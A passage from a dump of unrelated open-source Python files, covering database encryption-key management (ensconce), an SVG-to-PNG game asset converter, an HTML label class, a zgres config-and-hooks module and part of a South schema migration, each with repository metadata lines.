except exc.CryptoAuthenticationFailed:
log.exception("Validation fails due to error decrypting block.")
return False
else:
return True
except NoResultFound:
raise exc.MissingKeyMetadata()
except MultipleResultsFound:
raise exc.CryptoError("Multiple key metadata rows are not supported.")
except:
log.exception("Error validating encryption key.")
raise
def has_encrypted_data():
"""
Whether there is any encrypted data in the database.
The answer to this question can help determine whether it's ok to change
encryption keys w/o re-encrypting database, etc.
:raise ensconce.exc.UnconfiguredModel: If we can't create an SA session.
"""
try:
session = meta.Session()
p_t = model.passwords_table
r_t = model.resources_table
pw_cnt = session.query(func.count(p_t.c.id)).filter(and_(p_t.c.password != None, p_t.c.password != '')).scalar()
rs_cnt = session.query(func.count(r_t.c.id)).filter(and_(r_t.c.notes != None, r_t.c.notes != '')).scalar()
except:
log.exception("Error checking for encrypted database data.")
raise
return (pw_cnt > 0 or rs_cnt > 0)
def create_key_validation_payload(key=None):
"""
    Utility function to create the encrypted payload that we will later use for key validation.
TODO: Consider replacing with something smarter. HMAC?
"""
some_bytes = get_random_bytes(256)
return engine.encrypt(some_bytes, key=key)
def clear_key_metadata():
"""
This is a utility function (built for testing) that just removes any key_metadata
rows (with the intent that they will get re-created during crypto initialization phase).
:raise ensconce.exc.UnconfiguredModel: If we can't create an SA session.
"""
if meta.Session is None:
raise exc.UnconfiguredModel()
session = meta.Session()
try:
session.execute(model.key_metadata_table.delete())
session.commit() # We are deliberately committing early here
except:
session.rollback()
log.exception("Error clearing key metadata table.")
raise
def initialize_key_metadata(key, salt, force_overwrite=False, nested_transaction=False):
"""
Called when key is first specified to set some database encrypted contents.
This must be run before the crypto engine has been initialized with the secret
key.
:param key: The new encryption and signing key set.
:type key: ensconce.crypto.MasterKey
:param salt: The salt to use for the KDF function. IMPORTANT: This cannot change w/o re-encrypting database.
:type salt: str
:param force_overwrite: Whether to delete any existing metadata first (dangerous!)
:type force_overwrite: bool
:param nested_transaction: Whether this is being run within an existing transaction (i.e. do not commit).
:type nested_transaction: bool
:raise ensconce.exc.CryptoAlreadyInitialized: If the engine has already been initialized we bail out.
:raise ensconce.exc.UnconfiguredModel: If we can't create an SA session.
:raise ensconce.exc.ExistingKeyMetadata: If there is already key metadata (and `force_overwrite` param is not `True`).
"""
assert isinstance(key, MasterKey)
assert isinstance(salt, str)
if state.initialized:
raise exc.CryptoAlreadyInitialized()
if meta.Session is None:
raise exc.UnconfiguredModel()
session = meta.Session()
try:
existing_keys = session.query(model.KeyMetadata).all()
if len(existing_keys) > 0:
if force_overwrite:
for ek in existing_keys:
session.delete(ek)
log.warning("Forcibly removing existing metadata: {0}".format(ek))
session.flush()
else:
raise exc.ExistingKeyMetadata()
km = model.KeyMetadata()
km.id = 0 # Chosen to be obviously out of auto-increment "range"
km.validation = create_key_validation_payload(key=key)
km.kdf_salt = salt
session.add(km)
if not nested_transaction:
session.commit() # We are deliberately committing early here
else:
session.flush()
except:
if not nested_transaction:
# This conditional probably has little effect, since the connection will be in err state anyway
# until a rollback is issued.
session.rollback()
log.exception("Error initializing key metadata")
raise
def replace_key(new_key, force=False):
"""
Replaces the database key. If there are encrypted contents in the database, you
must specify force=True which will *reencrypt* the database contents with the new key.
This is dangerous.
!!!! BACKUP FIRST !!!!
!!!! STOP WEB SERVER !!!!
:param new_key: The new encryption key.
:raise ensconce.exc.CryptoNotInitialized: If the engine has not been initialized (with the correct current key).
:raise ensconce.exc.MissingKeyMetadata: If the metadata row does not exist yet.
:raise ensconce.exc.MultipleKeyMetadata: If there are multiple metadata rows.
:raise ensconce.exc.UnconfiguredModel: If we can't create an SA session.
:raise ensconce.exc.DatabaseAlreadyEncrypted: If database has encrypted data and `force` param is not `True`.
"""
assert isinstance(new_key, MasterKey)
if not state.initialized:
raise exc.CryptoNotInitialized()
if meta.Session is None:
raise exc.UnconfiguredModel()
if has_encrypted_data() and not force:
raise exc.DatabaseAlreadyEncrypted("Database has existing encrypted data (must specify force to reencrypt existing data).")
session = meta.Session()
assert session.autocommit == False
with state.key_lock:
try:
key_info = session.query(model.KeyMetadata).one()
pass_t = model.passwords_table
# Re-encrypt all of the passwords with the new key.
for pw in session.query(model.Password).filter(and_(pass_t.c.password != None, pass_t.c.password != '')):
# Important: set the *encrypted* password here (not password_decrypted)
pw.password = engine.encrypt(pw.password_decrypted, key=new_key)
session.flush()
ph_t = model.password_history_table
for pwh in session.query(model.PasswordHistory).filter(and_(ph_t.c.password != None, ph_t.c.password != '')):
# Important: set the *encrypted* password here (not password_decrypted)
pwh.password = engine.encrypt(pwh.password_decrypted, key=new_key)
session.flush()
# Re-encrypt all of the notes fields for resources
resources_t = model.resources_table
for rsc in session.query(model.Resource).filter(and_(resources_t.c.notes != None, resources_t.c.notes != '')):
                # Important: set the *encrypted* notes here (not notes_decrypted)
rsc.notes = engine.encrypt(rsc.notes_decrypted, key=new_key)
session.flush()
key_info.validation = create_key_validation_payload(key=new_key)
session.flush()
state.secret_key = new_key
except NoResultFound:
raise exc.MissingKeyMetadata("No key metadata found; initialize key metadata before replacing key.")
except MultipleResultsFound:
raise exc.CryptoError("Multiple key metadata rows are not supported.")
except:
session.rollback()
log.exception("Error replacing key; rolling back transaction.")
raise
else:
session.commit()
|
EliAndrewC/ensconce
|
ensconce/crypto/util.py
|
Python
|
bsd-3-clause
| 13,559
|
CHECKPOINT_FREQUENCY = 100
CHECKPOINT_MIN_WAIT = 300
DEFAULT_PROCESSOR_CHUNK_SIZE = 10
|
dimagi/commcare-hq
|
corehq/ex-submodules/pillowtop/const.py
|
Python
|
bsd-3-clause
| 88
|
'''
Created on Apr 18, 2010
@author: ulno
Generate, from the SVG sources in the images path, the corresponding output directory of PNG images.
inkscape is needed for this.
'''
import glob
import sys
import os
import re
import subprocess
import distutils.dir_util
import pygame
# the source images in SVG
IMAGE_DIRECTORY=os.path.join("..","images")
# the directory where the images will be saved
#OUTPUT_DIRECTORY=os.path.join("..","..","android","assets","entities")
# this will be the intermediate directory for serving as the input for the texture packer
OUTPUT_DIRECTORY=os.path.join("..","images-packer-input")
# the generated source-file to load and access the images
OUTPUT_FILE=os.path.join("..","..","core","src","com","mcminos","game","Entities.java")
IMAGE_FORMAT="RGBA"
CONFIG_FILE="CONFIG"
README_FILE="README"
# options, which will be evaluated from CONFIG and their defaults
config_options={
"symbol":'\0', # the symbol representing the entity
"size":(1,1), # the multiplier for the size (castle:2, explosion: 3)
"speed":100, # the animation speed or animation speed list (10 frames per second default)
"order":[0], # the order of the images
"zindex":700, # show this on which level?
"focus":(1,1), # anchor point of the icon
"moving":False, # This object moves by itself (like mcminos or the ghosts)
}
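# Illustrative sketch (an assumption, not a CONFIG file shipped with the repo): a CONFIG
# file is plain Python that is exec'd by the directory walker below and may override any
# of the defaults above, e.g. a two-tile entity with a custom animation sequence:
_EXAMPLE_CONFIG_TEXT = (
    "symbol = 'M'\n"
    "size = (2, 2)\n"
    "speed = [100, 50, 50]\n"
    "order = [0, 1, 2]\n"
    "zindex = 800\n"
)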
# w equals h, so only one value here; to speed up gaming, resolutions must be powers of 2
SIZE_LIST = [128,64,32,16]
# 8 and 4 are generated from mini
#SIZE_LIST = [128,64,16] # for testing
SIZE_LIST_MINI = [8,4]
#try:
# os.rmdir(OUTPUT_DIRECTORY)
#except OSError:
# pass # ignore missing directory
#os.mkdir(OUTPUT_DIRECTORY)
filename_format = re.compile("(?P<config>"+CONFIG_FILE+")|" + # can be config
"(?P<readme>"+README_FILE+")|" + # or readme
"(?P<minidesc>.*)" + # some descriptive stuff, which will be moved to the naming part
"(?P<mini>mini\.svg)|" + # or mini image
"(?:" + # or
"(?P<description>.*)" + # some descriptive stuff, which will be moved to the naming part
"(?P<animation_number>\d\d)" + # animation number
"(?:\.(?P<svg>svg)|-(?P<width>\d\d)x(?P<height>\d\d)\.png)" + # extension
")$")
# "(?P<name>[a-zA-Z]" + # Start with a letter
# "[a-zA-Z0-9_\-]*)" + # Continue with several alpha numerics or - or _
# "(?:-x(?P<scaling>\d\d))?" + # Have maybe scaling
invalid_name_chars = re.compile("[\-\.]")
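# Illustrative sketch (not part of the original script): a few hypothetical file names and
# the named groups filename_format above is expected to pull out of them.
def _example_filename_parsing():
    samples = ["ghost01.svg", "castle-big02-64x64.png", "mcminos-mini.svg", "CONFIG"]
    results = {}
    for s in samples:
        m = filename_format.match(s)
        results[s] = m.groupdict() if m else None
    return results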
config_dictionary={}
config_dictionary[""]=config_options
entity_list={} # The dictionary storing entities
images_count = 0 # total number of images
class Animation_Image():
'''One image of an animation.'''
def __init__(self, image, animation_step):
self.image = image
self.animation_step = animation_step
def get(self):
return (self.image, self.animation_step)
class Graphics_Element():
def __init__(self, name, config):
"""
config must have the form of the config_options
"""
self.image_dictionary = {} # this dictionary includes dictionaries with sizes per category
self.name = name
self.config = config.copy()
print "Creating new entity", name, " with config", config
def add_image(self,
png_file_name,
block_resolution,
multiple_w,multiple_h,
animation_step = 0):
if not block_resolution in self.image_dictionary:
self.image_dictionary[block_resolution] = {} # This will store the images of the animations under their corresponding step-number
self.image_dictionary[block_resolution][animation_step] = \
Animation_Image(png_file_name, animation_step)
print "Adding to graphic:",self.name,\
"storage resolution:",block_resolution,\
"real size:",(multiple_w*block_resolution,multiple_h*block_resolution),\
"step:",animation_step
# def check_size(self, width, category="default"):
# if category in self.image_dictionary:
# return width in self.image_dictionary[category]
def code(self,preload):
'''
get some code for the current graphics element.
if preload == 1 then just generate code for asset-manager
'''
global images_count
first_size = self.image_dictionary.keys()[0]
if preload == 0:
anisteps = self.image_dictionary[first_size].keys()
if self.config["order"] == None:
self.config["order"] = anisteps
            if not isinstance(self.config["speed"], list):
self.config["speed"] = [self.config["speed"]] \
* len(self.config["order"])
current = "" + self.name
if preload == 0:
code = "%s = new Graphics(\'%s\',%s,%s,%s,%s,%s,%s);\n" % \
( current, self.config["symbol"],
self.config["focus"][0]-1, self.config["focus"][1]-1,
self.config["zindex"], repr(self.config["moving"]).lower(),
self.config["size"][0], self.config["size"][1])
else: code = ""
for size in self.image_dictionary:
anisteps = self.image_dictionary[size].keys()
anisteps.sort()
            step_nr = 0 # always start with 0
for anistep in anisteps:
(img, _) = self.image_dictionary[size][anistep].get()
image_name = "%s_%s" \
% (self.name,anistep)
#file_name = os.path.join( OUTPUT_DIRECTORY, image_name + ".png" )
#loc_name = os.path.join("entities", image_name + ".png")
loc_name = os.path.join(image_name)
if preload == 0:
code += "%s.addImage( atlas, \"%s\", %s, %s );\n" % ( current, \
loc_name, \
size, step_nr)
images_count += 1
else:
code += "manager.load( \"%s\", Texture.class );\n" % loc_name
step_nr += 1
if preload == 0:
for size in self.image_dictionary:
                step_nr = 0 # always start with 0
anisteps = self.image_dictionary[size].keys()
assert len(self.config['speed']) == len(self.config['order']), \
"number of animation times does not match config."
anisteps.sort()
print self.config['speed'], self.config['order'], anisteps
if len(self.config['order']) <= 1:
self.config['order'] = anisteps[:]
if len(self.config['speed']) == 1:
self.config['speed'] = self.config['speed'] * len(anisteps)
print self.config['speed'], self.config['order'], anisteps
step_nr = 0
for anistep in self.config['order']:
image_nr = anisteps.index( self.config["order"][step_nr] )
code += "%s.addAnimationStep( %s, %s );\n" % \
(current, image_nr, \
self.config['speed'][step_nr])
step_nr += 1
break # only do for one size (should be the same for all sizes)
return code
def cleanup_description(desc):
if desc == "": return ""
# cut non-numerical letters from left and right
while(not desc[0].isalpha()):
desc= desc[1:]
while(not desc[-1].isalpha()):
desc= desc[:-1]
# transform all weird letters in between
desc=re.sub(invalid_name_chars, "_", desc) # replace . and - with _
return desc
def generate_name(name, description):
if name == "":
name = description
else:
if description != "":
name = name + "_" + description
return name
process_list = []
def mkdir(dir):
subprocess.call(["mkdir","-p",dir])
def convert(input_file,output_file, resx, resy):
global process_list
# only change if not exists or source is newer
    # absolute path is required for inkscape on MacOSX
output_path = os.path.abspath(output_file)
input_path = os.path.abspath(input_file)
if not os.path.isfile(output_path) or os.path.getmtime(input_path) > os.path.getmtime(output_path):
if len(process_list) == 8:
# wait until all are done
for p in process_list:
p.wait()
process_list=[]
p = subprocess.Popen(["inkscape",
"-w", "%d"%(int(resx)),
"-h", "%d"%(int(resy)),
"-e", output_path, input_path],
stdout=subprocess.PIPE)
process_list.append(p)
def convert_images(sizes, name, animation_number, root, file):
# check if entity exists
if not name in entity_list:
entity_list[name] = Graphics_Element(name,config)
current_entity = entity_list[name]
scaling=config["size"]
multiple_w=scaling[0]
multiple_h=scaling[1]
assert multiple_w>0 and multiple_h>0, "Wrong scaling."
for resolution in sizes:
# make sure destination directory exists
distutils.dir_util.mkpath( os.path.join( OUTPUT_DIRECTORY, str(resolution) ) )
packfile = os.path.join( OUTPUT_DIRECTORY, str(resolution), "pack.json" )
if not os.path.isfile(packfile): # create if necessary
# res = max(1024,int(resolution)*16)
res = 1024 # fix to see, if this accelerates
pf=open(packfile,"w")
pf.write("{\nuseIndexes: false,\nmaxWidth: %s,\nmaxHeight: %s\n}"%(res,res))
pf.close()
# convert file with inkscape
#print "width",width,"mutiples",multiple_w,multiple_h,"total",int(width)*multiple_w,int(width)*multiple_h
image_name = "%s_%s" \
% (name,animation_number)
output_file = os.path.join( OUTPUT_DIRECTORY, str(resolution), image_name + ".png" ) # check if destination already exists and skip
input_file = os.path.join(root,file)
convert(input_file, output_file,int(resolution)*multiple_w,int(resolution)*multiple_h )
current_entity.add_image(output_file,
int(resolution),
multiple_w,multiple_h,
animation_step = animation_number)
# main program -- walk input directory
for root, dirs, files in os.walk(IMAGE_DIRECTORY,topdown=True):
short_root = root[len(IMAGE_DIRECTORY)+1:] # cut off root
if len(short_root) > 0 and not short_root.startswith("flavors"): # not main directory - any sub-directory, only folders in main-directory are read, skip flavors directory
# construct the name
short_root_elements = short_root.split(os.path.sep)
root_class_name = "_".join(short_root_elements)
complete_name = re.sub(invalid_name_chars,"_",root_class_name) # replace . and - with
# find parent
parent_path = "_".join(short_root_elements[:-1])
parent_name = re.sub(invalid_name_chars, "_", parent_path) # replace . and - with _
# as top-down, needs to exist
#config_dictionary[complete_name] = config_dictionary[parent_name].copy()
new_config = config_dictionary[parent_name].copy()
print "Taking initial configuration from parent_path", parent_path, "Config:", new_config
# We are in a new directory -> Parse CONFIG, if available
if CONFIG_FILE in files:
# make config active in current scope
for option in new_config:
exec( "%s=%s" % (option, repr(new_config[option]) ))
# we execute any python code here, nothing for the enduser (TODO: maybe check format here)
exec(open(os.path.join(root,CONFIG_FILE)).read())
#new_config = {}
# write back to dictionary
for option in new_config:
new_config[option]=eval(option)
config_dictionary[complete_name]=new_config
print "Parsed configuration in ", root, "for ",complete_name,":", new_config
config_dictionary[complete_name] = new_config
config = config_dictionary[complete_name]
# check scaling parameter
if not isinstance(config["size"],tuple): # probably two coordinates
scaling=config["size"]
config["size"]=(scaling,scaling)
for file in files:
name = complete_name # init base-name
print "Working on: path:", short_root, "File name:", file
m = filename_format.match(file) # analyze filename
if m==None:
print "wrong filename format"
elif m.group("config") != None \
or m.group("readme") != None: # ignore config, readme
print "ignored or parsed before"
print
elif m.group("mini") != None: # This is the mini file
description = cleanup_description(m.group("minidesc"))
name = generate_name(name, description)
print "Found mini-file for", name ,"for configuration", config
# convert_images(SIZE_LIST_MINI,name,animation_number,root,file)
convert_images(SIZE_LIST_MINI,name,0,root,file)
else: # seems to be a regular image
description=m.group("description")
animation_number=int(m.group("animation_number"))
svg = m.group("svg") != None
width=None
height=None
if not svg:
width = int(m.group("width"))
height = int(m.group("height"))
# if there is a description add it to the name
if description != "":
description = cleanup_description( description )
name = generate_name( name, description )
# print report
print \
"""name: %(name)s
animation-nr: %(animation_number)s
is-svg: %(svg)s
width: %(width)s
height: %(height)s
config: %(config)s
"""%locals()
# if there is a name, convert images
if name != "":
if svg: # if this is an svg, create all missing sizes
convert_images(SIZE_LIST,name,animation_number,root,file)
else: # This is already a pixel-graphics (no svg)
pass # TODO: overwrite or add this
####### all parsed, now print code
print "Writing output file %s." % OUTPUT_FILE
f=open(OUTPUT_FILE,"w")
f.write( \
"""package com.mcminos.game;
/* Attention: this file is auto-generated by convert_images,
* do not change. */
import com.badlogic.gdx.ApplicationAdapter;
import com.badlogic.gdx.Gdx;
import com.badlogic.gdx.graphics.GL20;
import com.badlogic.gdx.graphics.Texture;
import com.badlogic.gdx.graphics.g2d.SpriteBatch;
import com.badlogic.gdx.assets.AssetManager;
import com.badlogic.gdx.graphics.g2d.TextureAtlas;
/* class is a singleton */
class Entities {
private static Entities ourInstance = new Entities();
public static Entities getInstance() {
return ourInstance;
}
""" )
for e in entity_list:
f.write( "public static Graphics %s;\n"%e )
resList = SIZE_LIST[:]
resList.sort(reverse=True)
f.write("\n public final static int[] resolutionList={%s};\n" \
% (",".join(map(str,resList))) )
f.write( \
"""
public static void scheduleLoad(AssetManager manager) {
""" )
#for e in entity_list:
# print "Working on", e
# f.write( entity_list[e].code(1) )
f.write("manager.load(\"entities/pack.atlas\",TextureAtlas.class);")
f.write( \
"""
} // end scheduleLoad
""" )
f.write( \
"""
public static void finishLoad(TextureAtlas atlas) {
""" )
for e in entity_list:
print "Working on", e
f.write( entity_list[e].code(0) )
f.write( "%s.finishInit();\n"%e )
f.write( \
"""
} // end finishLoad
""" )
f.write( \
"""
public static int numberImages = %d;
} // end Entities class
""" % images_count)
f.close()
# create icon-images for ios and android
print
print "============= Now creating resource icons ============"
for flavor in ["alive","forge","teaser"]:
image_dir = os.path.join(IMAGE_DIRECTORY,"flavors",flavor)
output_dir = os.path.join(IMAGE_DIRECTORY,"..","flavors",flavor)
print "Processing from " + image_dir + " to " + output_dir
icon = os.path.join(image_dir,"loadscreen.svg")
output_file = os.path.join(output_dir, "loadscreen.png")
print output_file
convert(icon,output_file,1600,1600)
icon = os.path.join(image_dir,"icon.svg")
icon_output_path = os.path.join(output_dir, "res")
for (path,res) in [("hdpi",72), ("mdpi",48), ("xhdpi",96), ("xxhdpi",144), ]:
op = os.path.join(icon_output_path, "drawable-" + path)
mkdir(op)
output_file = os.path.join( op, "ic_launcher.png")
convert(icon,output_file,res,res)
icon_output_path = os.path.join(output_dir, "data")
mkdir(icon_output_path)
for (path,res) in [("",57), ("-72",72), ("-76",76), ("@2x",114), ("-120",120), ("-72@2x",144), ("-152",152), ]:
output_file = os.path.join(icon_output_path, "Icon" + path + ".png")
convert(icon,output_file,res,res)
icon = os.path.join(image_dir,"logo-3-4.svg")
for (path,resx,resy) in [("",320,480), ("@2x",640,960) ]:
output_file = os.path.join(icon_output_path, "Default" + path + ".png")
convert(icon,output_file,resx,resy)
icon = os.path.join(image_dir,"logo-9-16.svg")
for (path,resx,resy) in [("-375w-667h",375,667), ("-375w-667h@2x",375*2,667*2), ("-414w-736h",414,736), ("-414w-736h@3x",414*3,736*3), ("-568h@2x",640,1136) ]:
output_file = os.path.join(icon_output_path, "Default" + path + ".png")
convert(icon,output_file,resx,resy)
icon = os.path.join(image_dir,"logo-10-13.svg")
for (path,resx,resy) in [("@2x~ipad",1536,2008), ("~ipad",768,1004), ]:
output_file = os.path.join(icon_output_path, "Default" + path + ".png")
convert(icon,output_file,resx,resy)
# finish inkscape processes first
for p in process_list:
p.wait()
# now call the packer
print
print "============= Now packing textures ============"
os.chdir("..")
os.chdir("..")
os.system("./gradlew texturePacker --stacktrace")
|
ulno/mcminos
|
extra/converters/convert_images.py
|
Python
|
gpl-3.0
| 18,629
|
from .HtmlElementModule import HtmlElement
from .TextElementModule import TextElement
class Label(HtmlElement):
def __init__(self, value, **attributes):
HtmlElement.__init__(self, 'label', **attributes)
self.append(TextElement(value))
|
megamandos/spiderbox
|
html/LabelModule.py
|
Python
|
mit
| 256
|
#!/usr/bin/python3
"""Apply a configuration file to a node
For example, we have the configuration of the databases in Zookeeper. We write
that config out to a JSON file:
/var/lib/zgres/config/databases.json
But, then we need to use that config to reconfigure various services, so we
write the code to reconfigure them to executable hook files in:
/var/lib/zgres/hooks/
To actually apply the config by running the hooks, we run:
zk-apply
This will run the hooks in /var/lib/zgres/hooks/ in order passing as the first
argument the directory containing the config file. If a hook fails, it is
logged, but the next hooks are run anyway.
NOTE: It is VERY important that hooks be idempotent! They WILL be called multiple times
with the same configuration.
"""
import os
import json
import sys
from logging import getLogger
import argparse
from subprocess import call, check_call
from collections import abc
import asyncio
from .plugin import subscribe
import zgres.config
_logger = getLogger('zgres')
#
# Hook Tools
#
_DEFAULT_PREFIX = '/var/lib/zgres/'
class Config(abc.Mapping):
"""A proxy object for the config directory which deserializes the config"""
def __init__(self, config_dir=None):
if config_dir is None:
config_dir = _DEFAULT_PREFIX
self._config_dir = config_dir
self._cache = {}
def __getitem__(self, name):
file = os.path.join(self._config_dir, name)
if not os.path.exists(file):
raise KeyError(name)
cached = self._cache.get(name, self)
if cached is not self:
return cached
with open(file, 'r') as f:
data = f.read()
_, ext = os.path.splitext(file)
if ext == '.json':
data = json.loads(data)
else:
raise NotImplementedError("Don't know how to deserialize {} files".format(ext))
self._cache[name] = data
return data
def __iter__(self):
for k in os.listdir(self._config_dir):
yield k
def __len__(self):
return len(os.listdir(self._config_dir))
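# Illustrative sketch (not part of the original module): how a hook written in Python might
# read the deserialized cluster state through the Config mapping above; the 'databases.json'
# key and the /var/lib/zgres/config path follow the module docstring.
def _example_read_databases(config_dir='/var/lib/zgres/config'):
    cfg = Config(config_dir)
    state = cfg['databases.json']  # parsed from JSON on first access, then cached
    return state.get('databases', [])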
def render_template(template, destination, **data):
with open(template, 'r') as f:
template = f.read()
result = template.format(**data)
return writeout(result, destination)
def writeout(data, destination):
if os.path.exists(destination):
with open(destination, 'r') as f:
existing = f.read()
if existing == data:
return False
head, tail = os.path.split(destination)
tmpfile = os.path.join(head, '.' + tail + '.zgres_tmp')
with open(tmpfile, 'w') as f:
f.write(data)
os.rename(tmpfile, destination)
return True
#
# Apply
#
def _run_hooks(hooks, cfg_dir):
failures = 0
for filename in sorted(os.listdir(hooks)):
if filename.startswith('.'):
continue
hook = os.path.join(hooks, filename)
if not os.access(hook, os.X_OK):
_logger.warn('Not running non-executable hook: {}'.format(hook))
continue
returncode = _run_one_hook(hook, cfg_dir)
if returncode != 0:
_logger.error('Failure when running hook: {}'.format(hook))
failures += 1
return failures
def _run_one_hook(hook, path):
# private function so tests can patch it
return call([hook, path])
def _apply(_prefix=_DEFAULT_PREFIX):
cfg_dir = os.path.join(_prefix, 'config')
hooks = os.path.join(_prefix, 'hooks')
failures = _run_hooks(hooks, cfg_dir)
return failures
class Plugin:
_write_timer = None
def __init__(self, name, app):
self._state = {
'databases': [],
'masters': {},
'conn_info': {}
}
@subscribe
def databases(self, databases):
_logger.info('New database list {}'.format(databases))
self._state['databases'] = databases
self._write()
@subscribe
def masters(self, masters):
_logger.info('New masters list {}'.format(masters))
self._state['masters'] = masters
self._write()
@subscribe
def conn_info(self, conn_info):
_logger.info('New conn_info list {}'.format(conn_info))
self._state['conn_info'] = conn_info
self._write()
def _write(self):
if self._write_timer is None:
loop = asyncio.get_event_loop()
# limit the writes to our list of databases to 1 per second
self._write_timer = loop.call_later(1, self._debounced_write)
def _debounced_write(self):
self._write_timer = None
with open('/var/lib/zgres/config/databases.json.tmp', 'w') as f:
f.write(json.dumps(self._state, sort_keys=True))
os.rename('/var/lib/zgres/config/databases.json.tmp', '/var/lib/zgres/config/databases.json')
_logger.info('Written databases.json, calling zgres-apply')
check_call('zgres-apply') # apply the configuration to the machine
#
# Command Line Scripts
#
def apply_cli(argv=sys.argv):
parser = argparse.ArgumentParser(description='Apply all loaded, but outstanding configs')
zgres.config.parse_args(parser, argv)
sys.exit(_apply())
|
jinty/zgres
|
zgres/apply.py
|
Python
|
mit
| 5,218
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Changing field 'FeedImport.total_videos'
db.alter_column('localtv_feedimport', 'total_videos', self.gf('django.db.models.fields.PositiveIntegerField')(null=True))
# Changing field 'SearchImport.total_videos'
db.alter_column('localtv_searchimport', 'total_videos', self.gf('django.db.models.fields.PositiveIntegerField')(null=True))
def backwards(self, orm):
# Changing field 'FeedImport.total_videos'
db.alter_column('localtv_feedimport', 'total_videos', self.gf('django.db.models.fields.PositiveIntegerField')())
# Changing field 'SearchImport.total_videos'
db.alter_column('localtv_searchimport', 'total_videos', self.gf('django.db.models.fields.PositiveIntegerField')())
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'localtv.category': {
'Meta': {'ordering': "['name']", 'unique_together': "(('slug', 'site'), ('name', 'site'))", 'object_name': 'Category'},
'contest_mode': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'logo': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'child_set'", 'null': 'True', 'to': "orm['localtv.Category']"}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sites.Site']"}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50'})
},
'localtv.feed': {
'Meta': {'unique_together': "(('feed_url', 'site'),)", 'object_name': 'Feed'},
'auto_approve': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'auto_authors': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'auto_feed_set'", 'blank': 'True', 'to': "orm['auth.User']"}),
'auto_categories': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['localtv.Category']", 'symmetrical': 'False', 'blank': 'True'}),
'avoid_frontpage': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'calculated_source_type': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
'etag': ('django.db.models.fields.CharField', [], {'max_length': '250', 'blank': 'True'}),
'feed_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'has_thumbnail': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_updated': ('django.db.models.fields.DateTimeField', [], {}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sites.Site']"}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'thumbnail_extension': ('django.db.models.fields.CharField', [], {'max_length': '8', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'blank': 'True'}),
'webpage': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'when_submitted': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'})
},
'localtv.feedimport': {
'Meta': {'ordering': "['-start']", 'object_name': 'FeedImport'},
'auto_approve': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'end': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'feed': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['localtv.Feed']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'start': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
